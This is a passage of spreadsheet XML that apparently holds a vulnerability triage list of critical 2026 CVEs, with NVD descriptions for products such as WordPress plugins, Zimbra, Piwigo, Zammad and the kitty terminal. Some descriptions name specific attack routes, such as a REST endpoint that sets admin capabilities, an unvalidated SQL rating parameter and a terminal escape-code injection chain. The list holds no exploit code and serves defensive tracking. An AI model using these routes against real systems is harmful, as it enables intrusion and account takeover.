      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr"/>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/srpt: Fix srpt_alloc_rw_ctxs() unwind counters
When srpt_alloc_rw_ctxs() fails partway through a multi-buffer indirect
descriptor, the unwind path destroys RDMA contexts but leaves stale
n_rw_ctx and n_rdma values (and a dangling rw_ctxs pointer). Later
sq_wr_avail accounting in srpt_queue_response() or srpt_write_pending()
can then subtract the wrong number of send queue credits.
Reset the counters and clear rw_ctxs after freeing the heap
allocation before returning an error.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100075</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14281</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>The Automation Web Platform – Notifications and OTP for WooCommerce, Advanced Country Code plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 4.8.6. This is due to missing permission enforcement on the publicly accessible REST route `POST /wp-json/wawp/v1/signup/&lt;op&gt;` and the absence of a key allowlist in the `finish_registration_logic` function, which copies the attacker-controlled `wawp_custom_fields` parameter directly into `update_user_meta()` — allowing sensitive meta keys such as `wp_capabilities` and `wp_user_level` to be set by the caller. This makes it possible for unauthenticated attackers to register a new account with the administrator role and gain full administrative access to the site. When OTP verification is enabled at signup, the OTP session token (`otp_transient`) is returned in plaintext in the HTTP response body, and the `handle_magic_link_request()` handler marks that token as verified on any unauthenticated GET request containing it without ever checking the OTP code value — making the OTP step trivially bypassable with no inbox or SMS access required.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14281</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92161</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>composer:fof/oauth</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr">
        <is>
          <t>1.7.4, 2.0.0-beta.4</t>
        </is>
      </c>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>FriendsOfFlarum OAuth allows users to log in to Flarum with GitHub, Twitter, Facebook, and other providers. Prior to 1.7.4 and 2.0.0-beta.4, the Discord OAuth provider does not check the verified field returned for an OAuth email before passing the address to Flarum core as trusted through provideTrustedEmail(). When Discord sign-in is enabled, an unauthenticated attacker who knows the email address of a Flarum user can configure a Discord account with that unverified address and a verified phone number, then sign in to cause Flarum to match the trusted address, link the attacker-controlled Discord identity to the existing user, and authenticate as the victim without a password or victim interaction. Exploitation requires that the victim's email address is not already associated with a Discord account, and it can compromise administrator accounts. Other bundled providers were not confirmed to be practically exploitable by this method because their relevant authentication flows return only verified or confirmed email addresses. This issue is fixed in versions 1.7.4 and 2.0.0-beta.4.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92161</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92609</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Session fixation in HTTP management authentication allows remote attackers to gain unauthorized access to an authenticated management session via reuse of a session identifier retained across successful authentication.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92609</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93643</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-863</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>When OnlyOffice/Document Editing is available, an unauthenticated remote attacker with access to an existing supported public Briefcase document can abuse unsigned save fields to perform path-traversal writes and execute commands as zimbra.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93643</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48482</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.0 until 11.0.8, a form administrator can use Form import with a crafted illustration or scene identifier that traverses outside the intended custom-asset directory. The imported file can be written to an executable server location, allowing a malicious script to be invoked remotely. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48482</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93641</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated sender can forge a share notification that triggers stored XSS when a signed-in Zimbra Classic recipient clicks Accept Share, allowing the attacker to access mailbox data and act as the victim.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93641</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93642</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated sender can forge a share notification that triggers stored XSS when a signed-in Zimbra Modern recipient clicks Accept Share, allowing the attacker to access mailbox data and act as the victim.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93642</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93647</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated calendar sender can place active markup in a COUNTER message's RFC From address. Selecting the message in Zimbra Classic triggers stored XSS, allowing the attacker to access mailbox data and act as the victim.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93647</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95832</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements in Output Used by a Downstream Component in the colour control escape code handler in kitty from 0.47.3 before 0.49.0 allows a program writing to the terminal to execute an arbitrary command in the user's shell, because color_control() in kitty/window.py answers a query for an unrecognised field name by placing that field name into the reply, and write_escape_code_to_child() in kitty/screen.c then writes the reply to the pseudoterminal master, where it is not distinguishable from input typed by the user, without neutralising it for the shell that reads it. The payload is reduced to printable ASCII before the field name is echoed, which is the restriction introduced in 0.47.3 as the fix for CVE-2026-54057, and the record and field separators ; and = are consumed as delimiters, but every other printable character survives, which is sufficient to compose a shell command. A newline is available from handle_remote_ssh() in kitty/window.py, which writes the bytes yielded by get_ssh_data() in kittens/ssh/utils.py, the first of which begin with a newline, to the pseudoterminal master before any credential carried in the request is checked. The reply is framed as an OSC sequence carrying the escape code number, the field name, and the literal value ?. This results in execution of an attacker-chosen command with the privileges of the user running the terminal.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95832</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39353</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>php, gin, rust, hp</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-732, CWE-98</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2-rc-1, InvoicePlane builds its permitted template list by scanning a PHP template directory that can be written through an administrator-controlled file-write capability. A malicious PHP file placed in the directory is automatically trusted by Mdl_templates and can be selected as public_invoice_template. When a public invoice is rendered, the guest View controller includes the trusted file and executes it with web-server privileges. This issue is fixed in version 1.7.2-rc-1.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39353</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42322</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, admin/themes_standard_pages.php validates uploaded logo content by MIME type but reuses the attacker-controlled extension from std_pgs_logo when constructing the stored filename. An authenticated administrator can upload image content with a server-executable final extension, causing the file to be placed in the web-accessible logo directory and executed when requested if the web server handles that extension. This can permit arbitrary command execution, data disclosure, modification, persistence, and service disruption. This vulnerability is fixed in 16.4.0.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42322</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62262</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. In 17.0.0beta1 and earlier, when rating is enabled, an unauthenticated guest can call pwg.images.filteredSearch.create with a crafted ratings[] value and then open the returned search URL. include/ws_functions/pwg.images.php stores the unvalidated value in the search rules, and include/functions_search.inc.php integer-casts only the lower rating bound while concatenating the raw value as the SQL upper bound. This allows error-based or blind extraction of database information and database-dependent time delays through the public search flow. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62262</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84458</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, when the "Automatic account link on initial logon" setting is enabled, Zammad binds an incoming third-party (SSO) identity to an existing local account by matching the email address the identity provider reports, without verifying that the provider actually confirmed ownership of that email. An attacker who controls any identity at a configured provider, including, by default, any Azure AD tenant via Zammad's multi-tenant Microsoft 365 /common app registration, can set that identity's email to a victim's address, authenticate, and be logged in as the victim. This bypasses the victim's local password entirely and affects any existing account, including agents and administrators. Zammad will honor the xms_edov ID token claim when email verification is required in the Microsoft 365 setting, treating a missing claim as unverified. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84458</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89055</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 5.120.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to permanently delete arbitrary attachments from the Media Library — including administrator-owned product images, logos, and documents — by injecting their IDs into a review that is later trashed and purged. Exploitation requires a public review-form link (a 13-hex formId distributed to customers via e-mail), which exposes the nonce needed to reach the handler without any WordPress account or session.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89055</t>
